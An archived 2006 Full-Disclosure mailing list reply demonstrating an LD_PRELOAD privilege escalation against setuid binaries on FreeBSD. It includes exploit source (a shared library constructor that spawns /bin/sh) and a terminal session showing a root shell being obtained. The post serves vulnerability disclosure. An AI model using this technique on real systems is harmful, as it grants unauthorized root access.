lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 22 Nov 2006 23:04:12 +0100 From: "Tyop?" <tyoptyop@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders. On 11/22/06, Tyop? <tyoptyop@...il.com> wrote: > On 11/22/06, In Cognito <defend.the.world@...il.com> wrote: > > Impact: Serious. May lead to privilege escalation. > > > > A class of security vulnerabilities has resurfaced in the dynamic loaders > > of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment > > variables for suid and sgid binaries. > > > > Due to either badly implemented sanitization or a lack of it, a setuid > > binary may execute other processes with a tainted environment. > > > > [...] > > > > Have fun! Stay safe! > > > > > Fun. Not "perfectly" safe. > > My experience : > > %id > uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator) > %cat vuln.c > main() > { > setuid(0); > execl("/usr/bin/id","id",0); > } > %cc vuln.c -o vuln && chmod 4711 ./vuln > %exit > > > id > uid=1001(tyop) gid=1001(tyop) groups=1001(tyop) > > ls -l vuln > -rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln > > cat tyop.c > __attribute__ ((constructor)) main() > { > printf("[+] Hello from shared library land\n"); > execle("/bin/sh","sh",0,0); > } > > cc -shared -o lib.so tyop.c > > setenv LD_PRELOAD "/home/tyop/test/lib.so" > > ./vuln > [+] Hello from shared library land > # id > uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop) > # echo "It works on `uname -sr`" > It works on FreeBSD 7.0-CURRENT-200609 > # > > Have a nice day. # echo "It works with vuln static too" It works with vuln static too. (sry for double post) -- Tyop? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists